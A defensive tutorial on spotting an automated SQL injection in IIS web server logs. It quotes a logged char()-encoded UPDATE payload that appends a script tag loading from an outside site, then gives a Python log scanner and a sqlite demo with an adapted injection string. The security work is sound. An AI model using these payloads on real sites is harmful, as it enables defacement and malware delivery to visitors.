
HOW TO STOP AN SQL INJECTION ATTACK

How To Detect SQL Injection In Your Web Server Logs To Identify And Stop An Attack

This particular variant (unlike earlier ones, which looped through the system objects table to find every text column they could write to) is targeted: the attacker reads your error pages to learn table and column names, then builds an UPDATE against those known tables and fields and appends it to the query string of an ordinary page request. You can find the hole by looking in your web server logs.

Below is one entry from my IIS log (a single line, wrapped here for display) so you can see what is being done:

2010-09-23 10:30:16 W3SVC1302398943 DM100 192.168.12.10 GET /search/List.cfm
D_Dealer_GUID=3f8722ff-6f72-4530-a953-09c39dd389601
'+update+q_ntd+set+Body=cast(Body+as+varchar(8000))%2Bcast(char(60)%2
Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2
Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2
Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2
Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2
Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(52)%2
Bchar(57)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2
Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2
Bchar(115)%2Bchar(99)%2
Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))
-- 80 - 77.78.239.56 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:

This is the string to look for; this family of automated injection attacks builds its payload with it:

cast(

CAST converts a value from one data type to another. In the entry above it converts the Body column of q_ntd to varchar(8000) so that string concatenation will work on it (text columns cannot be concatenated directly), then concatenates a second cast containing the injected text and writes the result back to every row. The injected text is assembled from char() calls so that no quotes or angle brackets have to appear in the request; the %2B between them is a URL-encoded +, SQL Server's string concatenation operator. Decoded, char(60)+char(47)+char(116)+... spells out

</title><script src=http://google-stats49.info/ur.php></script>

which is what ends up appended to your stored content. The apostrophe at the start of the payload closes the string literal in the page's own SELECT, so everything after it is parsed as a second statement, and the trailing -- comments out the remainder of the original query. SQL Server runs that second statement with the privileges of the login the application uses: if the page connects as sa, or as any login with UPDATE rights on the table, the UPDATE goes through even though the page only ever meant to run a read like a SELECT.

To find the injection, search the contents of all your web server log files (not just their names) for cast(, starting with the most recent. Several log files will match. Open the first one in WordPad and do a find on cast(. If you see a request like the one above, you have found the source. Search the raw log text rather than a decoded copy: the query field is URL-encoded, so cast( appears as is while the surrounding spaces and plus signs appear as + and %2B.
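The search above can be scripted. The following Python scanner is an added example and is not code from this article: it reads IIS W3C log text, picks the cs-uri-query column by name from the #Fields: header, URL-decodes it, flags requests containing cast( (plus, as my own additions, the DECLARE @ prologue of the older cursor-based variant and an appended UPDATE), and translates char()+char() runs back into the text they build so you can see what was injected. The sample log is constructed for the example, with a shortened field list; its third line carries the request quoted on this page, whose char() sequence decodes to the script tag described above.

```python
import re
import sys
from urllib.parse import unquote_plus

# Constructed sample of an IIS W3C log (field list shortened for the example).
# The third line carries the request quoted in this article; the others are benign.
INJECTED_QUERY = (
    "D_Dealer_GUID=3f8722ff-6f72-4530-a953-09c39dd389601"
    "'+update+q_ntd+set+Body=cast(Body+as+varchar(8000))%2Bcast(char(60)%2"
    "Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2"
    "Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2"
    "Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2"
    "Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2"
    "Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(52)%2"
    "Bchar(57)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2"
    "Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2"
    "Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)"
    "+as+varchar(8000))--"
)
SAMPLE_LOG = "\n".join([
    "#Fields: date time cs-method cs-uri-stem cs-uri-query s-port c-ip",
    "2010-09-23 10:29:58 GET /search/List.cfm D_Dealer_GUID=3f8722ff-6f72-4530-a953-09c39dd38960 80 10.0.0.5",
    "2010-09-23 10:30:16 GET /search/List.cfm " + INJECTED_QUERY + " 80 77.78.239.56",
    "2010-09-23 10:31:02 GET /images/logo.gif - 80 10.0.0.5",
])

# cast( is the fingerprint this article keys on. The other two alternatives are
# my additions: the DECLARE @... prologue of the older sysobjects-cursor variant,
# and the appended UPDATE itself.
SUSPECT = re.compile(r"cast\s*\(|\bdeclare\s+@|\bupdate\s+\S+\s+set\b", re.IGNORECASE)
# A run of char(N)+char(N)+...; the \b keeps varchar(8000) from matching.
CHAR_RUN = re.compile(r"\bchar\(\d+\)(?:\s*\+\s*\bchar\(\d+\))*", re.IGNORECASE)
CHAR_ONE = re.compile(r"\bchar\((\d+)\)", re.IGNORECASE)


def decode_char_runs(sql):
    """Collapse char(60)+char(47)+... into the quoted string it builds, so the
    injected HTML becomes readable instead of a wall of character codes."""
    def repl(match):
        text = "".join(chr(int(c)) for c in CHAR_ONE.findall(match.group(0)))
        return "'" + text.replace("'", "''") + "'"
    return CHAR_RUN.sub(repl, sql)


def scan_log(text):
    """Return one dict per suspicious request: log line number, client IP,
    page hit, and the URL-decoded query with char() runs translated."""
    fields, hits = None, []
    for number, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # the W3C header names the columns
            continue
        if not line or line.startswith("#"):
            continue
        columns = line.split(" ")
        if fields is None or len(columns) != len(fields):
            continue                            # malformed line: skip, do not crash
        row = dict(zip(fields, columns))
        query = unquote_plus(row.get("cs-uri-query", ""))   # %2B -> +, + -> space
        if SUSPECT.search(query):
            hits.append({
                "line": number,
                "client": row.get("c-ip", "?"),
                "page": row.get("cs-uri-stem", "?"),
                "sql": decode_char_runs(query),
            })
    return hits


if __name__ == "__main__":
    # Usage: python scan_iis_logs.py ex100923.log ex100922.log ...
    # With no arguments it scans the constructed sample above.
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            with open(path, encoding="utf-8", errors="replace") as fh:
                for hit in scan_log(fh.read()):
                    print(f"{path}:{hit['line']} {hit['client']} {hit['page']}\n    {hit['sql']}")
    else:
        for hit in scan_log(SAMPLE_LOG):
            print(f"sample:{hit['line']} {hit['client']} {hit['page']}\n    {hit['sql']}")
```

Run it over your log directory newest-first; each hit prints the line, the client IP, the page that took the injection and the decoded statement, which also gives you the exact string to search for in your database when cleaning up.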

The log entry tells you the site (s-sitename), the page (cs-uri-stem, /search/List.cfm here) and the parameter (D_Dealer_GUID) through which the injection arrived. When you find it, close the hole: pass the value to the query as a bound parameter (cfqueryparam in ColdFusion) instead of splicing it into the SQL string. Then cut the privilege: if the page only reads, as a SELECT does, connect to the database with a login that has read-only rights on the tables the page needs, so an injected UPDATE fails with a permissions error instead of rewriting your content. If you continue to connect to your database with more privileges than necessary, you will continue to have problems regardless of how well you filter the input.
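The two fixes, and why the second one matters even when the first is missed, can be shown end to end. The following is an added example, not code from this article or from the site it describes; it uses Python's bundled sqlite3 module rather than SQL Server, so the attacker's value is adapted to SQLite syntax (a semicolon between statements, || for concatenation in place of cast()+char()) while the mechanism is the same: a quote closes the page's string literal, an UPDATE follows, and -- comments out the rest. The q_ntd table and Body column come from the log entry above; the dealers table, the Name column, the GUID value and the script marker are constructed stand-ins. executescript stands in for a driver that accepts statement batches, as ColdFusion/ADO against SQL Server does.

```python
import os
import sqlite3
import tempfile
from pathlib import Path

# Constructed fixtures. q_ntd/Body come from the log entry in this article; the
# dealers table, the Name column, the GUID and the marker are stand-ins.
GOOD_GUID = "3f8722ff-6f72-4530-a953-09c39dd38960"
MARKER = "<script src=http://attacker.invalid/ur.php></script>"
# The attacker's value, adapted to SQLite syntax: ';' separates statements
# (T-SQL needs none) and || concatenates strings where T-SQL used cast()+char().
ATTACK_VALUE = GOOD_GUID + "1'; update q_ntd set Body=Body||'" + MARKER + "'--"


def build_db(path):
    """Fresh database with one dealer row and one stored page body to deface."""
    con = sqlite3.connect(path)
    con.executescript("""
        create table dealers(D_Dealer_GUID text, Name text);
        create table q_ntd(Id integer primary key, Body text);
        insert into q_ntd(Body) values ('<html><head><title>News</title></head><body>..</body></html>');
    """)
    con.execute("insert into dealers values (?, ?)", (GOOD_GUID, "Acme Motors"))
    con.commit()
    con.close()


def list_dealer_vulnerable(con, guid):
    """String-built query, like a cfquery that embeds #URL.D_Dealer_GUID# as-is.
    executescript mimics a driver that runs statement batches (SQL Server via
    ADO/ColdFusion does); sqlite3's execute() would reject the second statement,
    which is a property of that driver, not a defence you should rely on."""
    con.executescript(f"select Name from dealers where D_Dealer_GUID='{guid}'")


def list_dealer_safe(con, guid):
    """Bound parameter: the value travels as data and is never parsed as SQL."""
    cur = con.execute("select Name from dealers where D_Dealer_GUID=?", (guid,))
    return [name for (name,) in cur]


def body_defaced(path):
    con = sqlite3.connect(path)
    (body,) = con.execute("select Body from q_ntd").fetchone()
    con.close()
    return MARKER in body


def run_demo():
    """Return what happens to the stored page body under three configurations."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        # 1. String-built query on a login that may write: the UPDATE lands.
        path = os.path.join(tmp, "rw.db")
        build_db(path)
        con = sqlite3.connect(path)
        list_dealer_vulnerable(con, ATTACK_VALUE)
        con.commit()
        con.close()
        results["string_built_write_login"] = body_defaced(path)

        # 2. Same hole, but the page's connection is read-only: the UPDATE is refused.
        path = os.path.join(tmp, "ro.db")
        build_db(path)
        con = sqlite3.connect(Path(path).as_uri() + "?mode=ro", uri=True)
        try:
            list_dealer_vulnerable(con, ATTACK_VALUE)
            results["string_built_readonly_login"] = "update succeeded"
        except sqlite3.OperationalError as err:
            results["string_built_readonly_login"] = f"refused: {err}"
        con.close()
        results["readonly_body_defaced"] = body_defaced(path)

        # 3. Bound parameter: the attack string is just a GUID that matches nothing.
        path = os.path.join(tmp, "param.db")
        build_db(path)
        con = sqlite3.connect(path)
        results["parameterized_attack_rows"] = list_dealer_safe(con, ATTACK_VALUE)
        results["parameterized_good_rows"] = list_dealer_safe(con, GOOD_GUID)
        con.close()
        results["parameterized_body_defaced"] = body_defaced(path)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Scenario 2 is the point of the paragraph above: the code is still broken, yet the read-only login turns a site-wide defacement into an error in your log. Do both fixes, but do the privilege cut first if you cannot patch every page today.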

Read the SQL Injection article for more information on how to restrict access to your database server.